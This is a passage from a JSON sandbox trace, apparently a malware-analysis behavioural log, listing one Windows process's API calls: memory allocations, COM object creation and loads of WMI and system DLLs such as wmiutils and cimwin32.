                "name": "ProcessHandle",
                "value": "0xffffffff"
              },
              {
                "name": "StartRoutine",
                "value": "0x7ff79aafb120"
              },
              {
                "name": "Parameter",
                "value": "0x21e2b9f5280"
              },
              {
                "name": "CreationFlags",
                "value": "0x00000000"
              },
              {
                "name": "ThreadId",
                "value": "4280"
              },
              {
                "name": "ProcessId",
                "value": "3164"
              }
            ],
            "repeated": 0,
            "id": 55
          },
          {
            "timestamp": "2025-11-20 10:58:33,757",
            "thread_id": "1388",
            "caller": "0x7ff79aaf8469",
            "parentcaller": "0x7ff79aaf9b59",
            "category": "process",
            "api": "NtAllocateVirtualMemory",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "ProcessHandle",
                "value": "0xffffffff"
              },
              {
                "name": "BaseAddress",
                "value": "0x21e2b9fa000"
              },
              {
                "name": "RegionSize",
                "value": "0x00002000"
              },
              {
                "name": "Protection",
                "value": "0x00000004",
                "pretty_value": "PAGE_READWRITE"
              },
              {
                "name": "StackPivoted",
                "value": "no"
              }
            ],
            "repeated": 0,
            "id": 56
          },
          {
            "timestamp": "2025-11-20 10:58:33,757",
            "thread_id": "1388",
            "caller": "0x7ff79aafa124",
            "parentcaller": "0x7ff79aafb77b",
            "category": "process",
            "api": "NtAllocateVirtualMemory",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "ProcessHandle",
                "value": "0xffffffff"
              },
              {
                "name": "BaseAddress",
                "value": "0x21e2b9fc000"
              },
              {
                "name": "RegionSize",
                "value": "0x00002000"
              },
              {
                "name": "Protection",
                "value": "0x00000004",
                "pretty_value": "PAGE_READWRITE"
              },
              {
                "name": "StackPivoted",
                "value": "no"
              }
            ],
            "repeated": 0,
            "id": 57
          },
          {
            "timestamp": "2025-11-20 10:58:33,757",
            "thread_id": "4248",
            "caller": "0x7ffee10f6f4c",
            "parentcaller": "0x7ffee336ef53",
            "category": "system",
            "api": "NtDuplicateObject",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "SourceProcessHandle",
                "value": "0xffffffff"
              },
              {
                "name": "SourceHandle",
                "value": "0xfffffffe"
              },
              {
                "name": "TargetProcessHandle",
                "value": "0xffffffff"
              },
              {
                "name": "TargetHandle",
                "value": "0x000002fc"
              },
              {
                "name": "Options",
                "value": "0x00000002"
              }
            ],
            "repeated": 0,
            "id": 58
          },
          {
            "timestamp": "2025-11-20 10:58:33,757",
            "thread_id": "4248",
            "caller": "0x7ffee347e715",
            "parentcaller": "0x7ffee347e37b",
            "category": "process",
            "api": "NtAllocateVirtualMemory",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "ProcessHandle",
                "value": "0xffffffff"
              },
              {
                "name": "BaseAddress",
                "value": "0x21e2b9fe000"
              },
              {
                "name": "RegionSize",
                "value": "0x00001000"
              },
              {
                "name": "Protection",
                "value": "0x00000004",
                "pretty_value": "PAGE_READWRITE"
              },
              {
                "name": "StackPivoted",
                "value": "no"
              }
            ],
            "repeated": 0,
            "id": 59
          },
          {
            "timestamp": "2025-11-20 10:58:33,757",
            "thread_id": "4248",
            "caller": "0x7ffee347e715",
            "parentcaller": "0x7ffee347e37b",
            "category": "process",
            "api": "NtAllocateVirtualMemory",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "ProcessHandle",
                "value": "0xffffffff"
              },
              {
                "name": "BaseAddress",
                "value": "0x21e2b9ff000"
              },
              {
                "name": "RegionSize",
                "value": "0x00001000"
              },
              {
                "name": "Protection",
                "value": "0x00000004",
                "pretty_value": "PAGE_READWRITE"
              },
              {
                "name": "StackPivoted",
                "value": "no"
              }
            ],
            "repeated": 0,
            "id": 60
          },
          {
            "timestamp": "2025-11-20 10:58:33,757",
            "thread_id": "4248",
            "caller": "0x7ffee2fb92b9",
            "parentcaller": "0x7ffee2ff224d",
            "category": "com",
            "api": "CoCreateInstance",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "rclsid",
                "value": "00000338-0000-0000-C000-000000000046"
              },
              {
                "name": "ClsContext",
                "value": "0x00000403",
                "pretty_value": "CLSCTX_INPROC_SERVER|CLSCTX_INPROC_HANDLER|CLSCTX_NO_CODE_DOWNLOAD"
              },
              {
                "name": "riid",
                "value": "00000003-0000-0000-C000-000000000046"
              },
              {
                "name": "ProgID",
                "value": ""
              }
            ],
            "repeated": 0,
            "id": 61
          },
          {
            "timestamp": "2025-11-20 10:58:33,757",
            "thread_id": "4248",
            "caller": "0x7ffee347e715",
            "parentcaller": "0x7ffee347e37b",
            "category": "process",
            "api": "NtAllocateVirtualMemory",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "ProcessHandle",
                "value": "0xffffffff"
              },
              {
                "name": "BaseAddress",
                "value": "0x21e2ba02000"
              },
              {
                "name": "RegionSize",
                "value": "0x00001000"
              },
              {
                "name": "Protection",
                "value": "0x00000004",
                "pretty_value": "PAGE_READWRITE"
              },
              {
                "name": "StackPivoted",
                "value": "no"
              }
            ],
            "repeated": 0,
            "id": 62
          },
          {
            "timestamp": "2025-11-20 10:58:33,757",
            "thread_id": "4248",
            "caller": "0x7ffee347e715",
            "parentcaller": "0x7ffee347e37b",
            "category": "process",
            "api": "NtAllocateVirtualMemory",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "ProcessHandle",
                "value": "0xffffffff"
              },
              {
                "name": "BaseAddress",
                "value": "0x21e2ba03000"
              },
              {
                "name": "RegionSize",
                "value": "0x00001000"
              },
              {
                "name": "Protection",
                "value": "0x00000004",
                "pretty_value": "PAGE_READWRITE"
              },
              {
                "name": "StackPivoted",
                "value": "no"
              }
            ],
            "repeated": 0,
            "id": 63
          },
          {
            "timestamp": "2025-11-20 10:58:33,757",
            "thread_id": "4248",
            "caller": "0x7ffee347e715",
            "parentcaller": "0x7ffee347e37b",
            "category": "process",
            "api": "NtAllocateVirtualMemory",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "ProcessHandle",
                "value": "0xffffffff"
              },
              {
                "name": "BaseAddress",
                "value": "0x21e2ba04000"
              },
              {
                "name": "RegionSize",
                "value": "0x00002000"
              },
              {
                "name": "Protection",
                "value": "0x00000004",
                "pretty_value": "PAGE_READWRITE"
              },
              {
                "name": "StackPivoted",
                "value": "no"
              }
            ],
            "repeated": 0,
            "id": 64
          },
          {
            "timestamp": "2025-11-20 10:58:33,757",
            "thread_id": "4248",
            "caller": "0x7ffee2fb92b9",
            "parentcaller": "0x7ffee2ff224d",
            "category": "com",
            "api": "CoCreateInstance",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "rclsid",
                "value": "674B6698-EE92-11D0-AD71-00C04FD8FDFF"
              },
              {
                "name": "ClsContext",
                "value": "0x00000403",
                "pretty_value": "CLSCTX_INPROC_SERVER|CLSCTX_INPROC_HANDLER|CLSCTX_NO_CODE_DOWNLOAD"
              },
              {
                "name": "riid",
                "value": "00000003-0000-0000-C000-000000000046"
              },
              {
                "name": "ProgID",
                "value": ""
              }
            ],
            "repeated": 0,
            "id": 65
          },
          {
            "timestamp": "2025-11-20 10:58:33,757",
            "thread_id": "4248",
            "caller": "0x7ffed3feaddd",
            "parentcaller": "0x7ffed3fea3b7",
            "category": "com",
            "api": "CoGetClassObject",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "rclsid",
                "value": "E7D35CFA-348B-485E-B524-252725D697CA"
              },
              {
                "name": "ClsContext",
                "value": "0x80000001",
                "pretty_value": "CLSCTX_INPROC_SERVER|CLSCTX_PS_DLL"
              },
              {
                "name": "riid",
                "value": "D5F569D0-593B-101A-B569-08002B2DBF7A"
              },
              {
                "name": "ProgID",
                "value": ""
              }
            ],
            "repeated": 1,
            "id": 66
          },
          {
            "timestamp": "2025-11-20 10:58:33,757",
            "thread_id": "4248",
            "caller": "0x7ff79aaff038",
            "parentcaller": "0x00000000",
            "category": "system",
            "api": "DllLoadNotification",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "NotificationReason",
                "value": "load"
              },
              {
                "name": "DllName",
                "value": "C:\\Windows\\system32\\wbem\\wmiutils"
              },
              {
                "name": "DllBase",
                "value": "0x7ffedc210000"
              }
            ],
            "repeated": 0,
            "id": 67
          },
          {
            "timestamp": "2025-11-20 10:58:33,757",
            "thread_id": "4248",
            "caller": "0x7ff79aaff038",
            "parentcaller": "0x00000000",
            "category": "system",
            "api": "LdrLoadDll",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "Flags",
                "value": "0x00000000"
              },
              {
                "name": "FileName",
                "value": "C:\\Windows\\System32\\wbem\\wmiutils.dll"
              },
              {
                "name": "BaseAddress",
                "value": "0x7ffedc210000"
              }
            ],
            "repeated": 0,
            "id": 68
          },
          {
            "timestamp": "2025-11-20 10:58:33,757",
            "thread_id": "4248",
            "caller": "0x7ff79aaff038",
            "parentcaller": "0x00000000",
            "category": "com",
            "api": "CoCreateInstance",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "rclsid",
                "value": "CF4CC405-E2C5-4DDD-B3CE-5E7582D8C9FA"
              },
              {
                "name": "ClsContext",
                "value": "0x00000001",
                "pretty_value": "CLSCTX_INPROC_SERVER"
              },
              {
                "name": "riid",
                "value": "3BC15AF2-736C-477E-9E51-238AF8667DCC"
              },
              {
                "name": "ProgID",
                "value": ""
              }
            ],
            "repeated": 0,
            "id": 69
          },
          {
            "timestamp": "2025-11-20 10:58:33,757",
            "thread_id": "4248",
            "caller": "0x7ffee10f6f4c",
            "parentcaller": "0x7ffee2f66d2f",
            "category": "system",
            "api": "NtDuplicateObject",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "SourceProcessHandle",
                "value": "0xffffffff"
              },
              {
                "name": "SourceHandle",
                "value": "0xfffffffe"
              },
              {
                "name": "TargetProcessHandle",
                "value": "0xffffffff"
              },
              {
                "name": "TargetHandle",
                "value": "0x000002f4"
              },
              {
                "name": "Options",
                "value": "0x00000002"
              }
            ],
            "repeated": 0,
            "id": 70
          },
          {
            "timestamp": "2025-11-20 10:58:33,757",
            "thread_id": "4248",
            "caller": "0x7ffee347e715",
            "parentcaller": "0x7ffee347e37b",
            "category": "process",
            "api": "NtAllocateVirtualMemory",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "ProcessHandle",
                "value": "0xffffffff"
              },
              {
                "name": "BaseAddress",
                "value": "0x21e2ba09000"
              },
              {
                "name": "RegionSize",
                "value": "0x00003000"
              },
              {
                "name": "Protection",
                "value": "0x00000004",
                "pretty_value": "PAGE_READWRITE"
              },
              {
                "name": "StackPivoted",
                "value": "no"
              }
            ],
            "repeated": 0,
            "id": 71
          },
          {
            "timestamp": "2025-11-20 10:58:33,757",
            "thread_id": "4248",
            "caller": "0x7ffee2fb92b9",
            "parentcaller": "0x7ffee2ff224d",
            "category": "com",
            "api": "CoCreateInstance",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "rclsid",
                "value": "674B6698-EE92-11D0-AD71-00C04FD8FDFF"
              },
              {
                "name": "ClsContext",
                "value": "0x00000403",
                "pretty_value": "CLSCTX_INPROC_SERVER|CLSCTX_INPROC_HANDLER|CLSCTX_NO_CODE_DOWNLOAD"
              },
              {
                "name": "riid",
                "value": "00000003-0000-0000-C000-000000000046"
              },
              {
                "name": "ProgID",
                "value": ""
              }
            ],
            "repeated": 0,
            "id": 72
          },
          {
            "timestamp": "2025-11-20 10:58:33,757",
            "thread_id": "4248",
            "caller": "0x7ff79aaf8469",
            "parentcaller": "0x7ff79aaf19c9",
            "category": "process",
            "api": "NtAllocateVirtualMemory",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "ProcessHandle",
                "value": "0xffffffff"
              },
              {
                "name": "BaseAddress",
                "value": "0x21e2ba0c000"
              },
              {
                "name": "RegionSize",
                "value": "0x00001000"
              },
              {
                "name": "Protection",
                "value": "0x00000004",
                "pretty_value": "PAGE_READWRITE"
              },
              {
                "name": "StackPivoted",
                "value": "no"
              }
            ],
            "repeated": 0,
            "id": 73
          },
          {
            "timestamp": "2025-11-20 10:58:33,757",
            "thread_id": "4248",
            "caller": "0x7ff79aaf1cb2",
            "parentcaller": "0x7ff79aaf1a68",
            "category": "process",
            "api": "NtAllocateVirtualMemory",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "ProcessHandle",
                "value": "0xffffffff"
              },
              {
                "name": "BaseAddress",
                "value": "0x21e2ba0d000"
              },
              {
                "name": "RegionSize",
                "value": "0x00002000"
              },
              {
                "name": "Protection",
                "value": "0x00000004",
                "pretty_value": "PAGE_READWRITE"
              },
              {
                "name": "StackPivoted",
                "value": "no"
              }
            ],
            "repeated": 0,
            "id": 74
          },
          {
            "timestamp": "2025-11-20 10:58:33,757",
            "thread_id": "4248",
            "caller": "0x7ff79aaf1cb2",
            "parentcaller": "0x7ff79aaf1a68",
            "category": "com",
            "api": "CoCreateInstance",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "rclsid",
                "value": "4590F812-1D3A-11D0-891F-00AA004B2E24"
              },
              {
                "name": "ClsContext",
                "value": "0x00000403",
                "pretty_value": "CLSCTX_INPROC_SERVER|CLSCTX_INPROC_HANDLER|CLSCTX_NO_CODE_DOWNLOAD"
              },
              {
                "name": "riid",
                "value": "00000003-0000-0000-C000-000000000046"
              },
              {
                "name": "ProgID",
                "value": ""
              }
            ],
            "repeated": 0,
            "id": 75
          },
          {
            "timestamp": "2025-11-20 10:58:33,772",
            "thread_id": "4248",
            "caller": "0x7ff79aaf4e98",
            "parentcaller": "0x7ff79aaf1ab3",
            "category": "process",
            "api": "NtAllocateVirtualMemory",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "ProcessHandle",
                "value": "0xffffffff"
              },
              {
                "name": "BaseAddress",
                "value": "0x21e2ba0f000"
              },
              {
                "name": "RegionSize",
                "value": "0x00002000"
              },
              {
                "name": "Protection",
                "value": "0x00000004",
                "pretty_value": "PAGE_READWRITE"
              },
              {
                "name": "StackPivoted",
                "value": "no"
              }
            ],
            "repeated": 0,
            "id": 76
          },
          {
            "timestamp": "2025-11-20 10:58:33,772",
            "thread_id": "4248",
            "caller": "0x7ff79aaf4e98",
            "parentcaller": "0x7ff79aaf1ab3",
            "category": "com",
            "api": "CoGetClassObject",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "rclsid",
                "value": "E7D35CFA-348B-485E-B524-252725D697CA"
              },
              {
                "name": "ClsContext",
                "value": "0x80000001",
                "pretty_value": "CLSCTX_INPROC_SERVER|CLSCTX_PS_DLL"
              },
              {
                "name": "riid",
                "value": "D5F569D0-593B-101A-B569-08002B2DBF7A"
              },
              {
                "name": "ProgID",
                "value": ""
              }
            ],
            "repeated": 0,
            "id": 77
          },
          {
            "timestamp": "2025-11-20 10:58:33,772",
            "thread_id": "4248",
            "caller": "0x7ff79aaf4ef3",
            "parentcaller": "0x7ff79aaf1ab3",
            "category": "process",
            "api": "NtAllocateVirtualMemory",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "ProcessHandle",
                "value": "0xffffffff"
              },
              {
                "name": "BaseAddress",
                "value": "0x21e2ba11000"
              },
              {
                "name": "RegionSize",
                "value": "0x00003000"
              },
              {
                "name": "Protection",
                "value": "0x00000004",
                "pretty_value": "PAGE_READWRITE"
              },
              {
                "name": "StackPivoted",
                "value": "no"
              }
            ],
            "repeated": 0,
            "id": 78
          },
          {
            "timestamp": "2025-11-20 10:58:33,772",
            "thread_id": "4248",
            "caller": "0x7ff79aaf56cb",
            "parentcaller": "0x7ff79aaf5514",
            "category": "system",
            "api": "DllLoadNotification",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "NotificationReason",
                "value": "load"
              },
              {
                "name": "DllName",
                "value": "C:\\Windows\\SYSTEM32\\powrprof"
              },
              {
                "name": "DllBase",
                "value": "0x7ffee09f0000"
              }
            ],
            "repeated": 0,
            "id": 79
          },
          {
            "timestamp": "2025-11-20 10:58:33,772",
            "thread_id": "4248",
            "caller": "0x7ff79aaf56cb",
            "parentcaller": "0x7ff79aaf5514",
            "category": "system",
            "api": "DllLoadNotification",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "NotificationReason",
                "value": "load"
              },
              {
                "name": "DllName",
                "value": "C:\\Windows\\SYSTEM32\\framedynos"
              },
              {
                "name": "DllBase",
                "value": "0x7ffeca3f0000"
              }
            ],
            "repeated": 0,
            "id": 80
          },
          {
            "timestamp": "2025-11-20 10:58:33,772",
            "thread_id": "4248",
            "caller": "0x7ff79aaf56cb",
            "parentcaller": "0x7ff79aaf5514",
            "category": "system",
            "api": "DllLoadNotification",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "NotificationReason",
                "value": "load"
              },
              {
                "name": "DllName",
                "value": "C:\\Windows\\system32\\wbem\\cimwin32"
              },
              {
                "name": "DllBase",
                "value": "0x7ffec3810000"
              }
            ],
            "repeated": 0,
            "id": 81
          },
          {
            "timestamp": "2025-11-20 10:58:33,772",
            "thread_id": "4248",
            "caller": "0x7ff79aaf56cb",
            "parentcaller": "0x7ff79aaf5514",
            "category": "system",
            "api": "DllLoadNotification",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "NotificationReason",
                "value": "load"
              },
              {
                "name": "DllName",
                "value": "C:\\Windows\\SYSTEM32\\UMPDC"
              },
              {
                "name": "DllBase",
                "value": "0x7ffee09d0000"
              }
            ],
            "repeated": 0,
            "id": 82
          },
          {
            "timestamp": "2025-11-20 10:58:33,788",
            "thread_id": "4248",
            "caller": "0x7ff79aaf56cb",
            "parentcaller": "0x7ff79aaf5514",
            "category": "system",
            "api": "LdrLoadDll",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "Flags",
                "value": "0x00000000"
              },
              {
                "name": "FileName",
                "value": "C:\\Windows\\System32\\wbem\\cimwin32.dll"
              },
              {
                "name": "BaseAddress",
                "value": "0x7ffec3810000"
              }
            ],
            "repeated": 0,
            "id": 83
          },
          {
            "timestamp": "2025-11-20 10:58:33,788",
            "thread_id": "4248",
            "caller": "0x7ff79aaf56cb",
            "parentcaller": "0x7ff79aaf5514",
            "category": "com",
            "api": "CoGetClassObject",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "rclsid",
                "value": "D63A5850-8F16-11CF-9F47-00AA00BF345C"
              },
              {
                "name": "ClsContext",
                "value": "0x00000001",
                "pretty_value": "CLSCTX_INPROC_SERVER"
              },
              {
                "name": "riid",
                "value": "00000001-0000-0000-C000-000000000046"
              },
              {
                "name": "ProgID",
                "value": ""
              }
            ],
            "repeated": 0,
            "id": 84
          },
          {
            "timestamp": "2025-11-20 10:58:33,788",
            "thread_id": "4248",
            "caller": "0x7ff79aaf998d",
            "parentcaller": "0x7ff79aaf899b",
            "category": "com",
            "api": "CoGetClassObject",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "rclsid",
                "value": "1108BE51-F58A-4CDA-BB99-7A0227D11D5E"
              },
              {
                "name": "ClsContext",
                "value": "0x00000005",
                "pretty_value": "CLSCTX_INPROC_SERVER|CLSCTX_LOCAL_SERVER"
              },
              {
                "name": "riid",
                "value": "00000001-0000-0000-C000-000000000046"
              },
              {
                "name": "ProgID",
                "value": ""
              }
            ],
            "repeated": 0,
            "id": 85
          },
          {
            "timestamp": "2025-11-20 10:58:33,788",
            "thread_id": "4248",
            "caller": "0x7ff79aaf7ab2",
            "parentcaller": "0x7ff79aaf5b48",
            "category": "com",
            "api": "CoCreateInstance",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "rclsid",
                "value": "CF4CC405-E2C5-4DDD-B3CE-5E7582D8C9FA"
              },
              {
                "name": "ClsContext",
                "value": "0x00000001",
                "pretty_value": "CLSCTX_INPROC_SERVER"
              },
              {
                "name": "riid",
                "value": "3BC15AF2-736C-477E-9E51-238AF8667DCC"
              },
              {
                "name": "ProgID",
                "value": ""
              }
            ],
            "repeated": 0,
            "id": 86
          },
          {
            "timestamp": "2025-11-20 10:58:33,788",
            "thread_id": "4248",
            "caller": "0x7ff79aafe7c7",
            "parentcaller": "0x7ff79aafe590",
            "category": "process",
            "api": "NtAllocateVirtualMemory",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "ProcessHandle",
                "value": "0xffffffff"
              },
              {
                "name": "BaseAddress",
                "value": "0x21e2ba14000"
              },
              {
                "name": "RegionSize",
                "value": "0x00003000"
              },
              {
                "name": "Protection",
                "value": "0x00000004",
                "pretty_value": "PAGE_READWRITE"
              },
              {
                "name": "StackPivoted",
                "value": "no"
              }
            ],
            "repeated": 0,
            "id": 87
          },
          {
            "timestamp": "2025-11-20 10:58:33,788",
            "thread_id": "4248",
            "caller": "0x7ffed3fea4f0",
            "parentcaller": "0x7ffed3fea195",
            "category": "com",
            "api": "CoGetClassObject",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "rclsid",
                "value": "E7D35CFA-348B-485E-B524-252725D697CA"
              },
              {
                "name": "ClsContext",
                "value": "0x80000001",
                "pretty_value": "CLSCTX_INPROC_SERVER|CLSCTX_PS_DLL"
              },
              {
                "name": "riid",
                "value": "D5F569D0-593B-101A-B569-08002B2DBF7A"
              },
              {
                "name": "ProgID",
                "value": ""
              }
            ],
            "repeated": 0,
            "id": 88
          },
          {
            "timestamp": "2025-11-20 10:58:33,788",
            "thread_id": "4248",
            "caller": "0x7ffee347e715",
            "parentcaller": "0x7ffee347e37b",
            "category": "process",
            "api": "NtAllocateVirtualMemory",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "ProcessHandle",
                "value": "0xffffffff"
              },
              {
                "name": "BaseAddress",
                "value": "0x21e2ba17000"
              },
              {
                "name": "RegionSize",
                "value": "0x00002000"
              },
              {
                "name": "Protection",
                "value": "0x00000004",
                "pretty_value": "PAGE_READWRITE"
              },
              {
                "name": "StackPivoted",
                "value": "no"
              }
            ],
            "repeated": 0,
            "id": 89
          },
          {
            "timestamp": "2025-11-20 10:58:33,788",
            "thread_id": "4248",
            "caller": "0x7ffed3feaddd",
            "parentcaller": "0x7ffed3fea3b7",
            "category": "com",
            "api": "CoGetClassObject",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "rclsid",
                "value": "E7D35CFA-348B-485E-B524-252725D697CA"
              },
              {
                "name": "ClsContext",
                "value": "0x80000001",
                "pretty_value": "CLSCTX_INPROC_SERVER|CLSCTX_PS_DLL"
              },
              {
                "name": "riid",
                "value": "D5F569D0-593B-101A-B569-08002B2DBF7A"
              },
              {
                "name": "ProgID",
                "value": ""
              }
            ],
            "repeated": 0,
            "id": 90
          },
          {
            "timestamp": "2025-11-20 10:58:33,788",
            "thread_id": "4248",
            "caller": "0x7ffee2fb92b9",
            "parentcaller": "0x7ffee2ff224d",
            "category": "com",
            "api": "CoCreateInstance",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "rclsid",
                "value": "674B6698-EE92-11D0-AD71-00C04FD8FDFF"
              },
              {
                "name": "ClsContext",
                "value": "0x00000403",
                "pretty_value": "CLSCTX_INPROC_SERVER|CLSCTX_INPROC_HANDLER|CLSCTX_NO_CODE_DOWNLOAD"
              },
              {
                "name": "riid",
                "value": "00000003-0000-0000-C000-000000000046"
              },
              {
                "name": "ProgID",
                "value": ""
              }
            ],
            "repeated": 1,
            "id": 91
          },
          {
            "timestamp": "2025-11-20 10:58:33,788",
            "thread_id": "4248",
            "caller": "0x7ffed3feaddd",
            "parentcaller": "0x7ffee2fc0030",
            "category": "com",
            "api": "CoGetClassObject",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "rclsid",
                "value": "E7D35CFA-348B-485E-B524-252725D697CA"
              },
              {
                "name": "ClsContext",
                "value": "0x80000001",
                "pretty_value": "CLSCTX_INPROC_SERVER|CLSCTX_PS_DLL"
              },
              {
                "name": "riid",
                "value": "D5F569D0-593B-101A-B569-08002B2DBF7A"
              },
              {
                "name": "ProgID",
                "value": ""
              }
            ],
            "repeated": 0,
            "id": 92
          },
          {
            "timestamp": "2025-11-20 10:58:33,788",
            "thread_id": "4248",
            "caller": "0x7ff79aafd767",
            "parentcaller": "0x7ff79ab014cb",
            "category": "process",
            "api": "NtAllocateVirtualMemory",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "ProcessHandle",
                "value": "0xffffffff"
              },
              {
                "name": "BaseAddress",
                "value": "0x21e2ba19000"
              },
              {
                "name": "RegionSize",
                "value": "0x00001000"
              },
              {
                "name": "Protection",
                "value": "0x00000004",
                "pretty_value": "PAGE_READWRITE"
              },
              {
                "name": "StackPivoted",
                "value": "no"
              }
            ],
            "repeated": 0,
            "id": 93
          },
          {
            "timestamp": "2025-11-20 10:58:33,788",
            "thread_id": "4248",
            "caller": "0x7ff79ab0158d",
            "parentcaller": "0x7ff79ab011eb",
            "category": "process",
            "api": "NtAllocateVirtualMemory",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "ProcessHandle",
                "value": "0xffffffff"
              },
              {
                "name": "BaseAddress",
                "value": "0x21e2ba1a000"
              },
              {
                "name": "RegionSize",
                "value": "0x00002000"
              },
              {
                "name": "Protection",
                "value": "0x00000004",
                "pretty_value": "PAGE_READWRITE"
              },
              {
                "name": "StackPivoted",
                "value": "no"
              }
            ],
            "repeated": 0,
            "id": 94
          },
          {
            "timestamp": "2025-11-20 10:58:33,788",
            "thread_id": "4248",
            "caller": "0x7ff79ab0158d",
            "parentcaller": "0x7ff79ab011eb",
            "category": "com",
            "api": "CoCreateInstance",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "rclsid",
                "value": "4590F812-1D3A-11D0-891F-00AA004B2E24"
              },
              {
                "name": "ClsContext",
                "value": "0x00000403",
                "pretty_value": "CLSCTX_INPROC_SERVER|CLSCTX_INPROC_HANDLER|CLSCTX_NO_CODE_DOWNLOAD"
              },
              {
                "name": "riid",
                "value": "00000003-0000-0000-C000-000000000046"
              },
              {
                "name": "ProgID",
                "value": ""
              }
            ],
            "repeated": 0,
            "id": 95
          },
          {
            "timestamp": "2025-11-20 10:58:33,788",
            "thread_id": "4248",
            "caller": "0x7ff79ab0158d",
            "parentcaller": "0x7ff79ab011eb",
            "category": "process",
            "api": "NtAllocateVirtualMemory",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "ProcessHandle",
                "value": "0xffffffff"
              },
              {
                "name": "BaseAddress",
                "value": "0x21e2ba1c000"
              },
              {
                "name": "RegionSize",
                "value": "0x00006000"
              },
              {
                "name": "Protection",
                "value": "0x00000004",
                "pretty_value": "PAGE_READWRITE"
              },
              {
                "name": "StackPivoted",
                "value": "no"
              }
            ],
            "repeated": 0,
            "id": 96
          },
          {
            "timestamp": "2025-11-20 10:58:33,788",
            "thread_id": "4248",
            "caller": "0x7ff79ab0158d",
            "parentcaller": "0x7ff79ab011eb",
            "category": "process",
            "api": "NtAllocateVirtualMemory",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "ProcessHandle",
                "value": "0xffffffff"
              },
              {
                "name": "BaseAddress",
                "value": "0x21e2ba22000"
              },
              {
                "name": "RegionSize",
                "value": "0x00003000"
              },
              {
                "name": "Protection",
                "value": "0x00000004",
                "pretty_value": "PAGE_READWRITE"
              },
              {
                "name": "StackPivoted",
                "value": "no"
              }
            ],
            "repeated": 0,
            "id": 97
          },
          {
            "timestamp": "2025-11-20 10:58:33,803",
            "thread_id": "4248",
            "caller": "0x7ff79ab0158d",
            "parentcaller": "0x7ff79ab011eb",
            "category": "filesystem",
            "api": "NtOpenFile",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "FileHandle",
                "value": "0x000002ec"
              },
              {
                "name": "DesiredAccess",
                "value": "0x00100021",
                "pretty_value": "FILE_READ_ACCESS|FILE_EXECUTE|SYNCHRONIZE"
              },
              {
                "name": "FileName",
                "value": "C:\\Windows\\System32\\winbrand.dll"
              },
              {
                "name": "ShareAccess",
                "value": "5",
                "pretty_value": "FILE_SHARE_READ|FILE_SHARE_DELETE"
              }
            ],
            "repeated": 0,
            "id": 98
          },
          {
            "timestamp": "2025-11-20 10:58:33,803",
            "thread_id": "4248",
            "caller": "0x7ff79ab0158d",
            "parentcaller": "0x7ff79ab011eb",
            "category": "process",
            "api": "NtMapViewOfSection",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "SectionHandle",
                "value": "0x00000330"
              },
              {
                "name": "ProcessHandle",
                "value": "0xffffffff"
              },
              {
                "name": "BaseAddress",
                "value": "0x7ffecbda0000"
              },
              {
                "name": "SectionOffset",
                "value": "0x00000000"
              },
              {
                "name": "ViewSize",
                "value": "0x00035000"
              },
              {
                "name": "Win32Protect",
                "value": "0x00000080",
                "pretty_value": "PAGE_EXECUTE_WRITECOPY"
              },
              {
                "name": "StackPivoted",
                "value": "no"
              }
            ],
            "repeated": 0,
            "id": 99
          },
          {
            "timestamp": "2025-11-20 10:58:33,803",
            "thread_id": "4248",
            "caller": "0x7ff79ab0158d",
            "parentcaller": "0x7ff79ab011eb",
            "category": "system",
            "api": "DllLoadNotification",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "NotificationReason",
                "value": "load"
              },
              {
                "name": "DllName",
                "value": "C:\\Windows\\SYSTEM32\\winbrand"
              },
              {
                "name": "DllBase",
                "value": "0x7ffecbda0000"
              }
            ],
            "repeated": 0,
            "id": 100
          },
          {
            "timestamp": "2025-11-20 10:58:33,803",
            "thread_id": "4248",
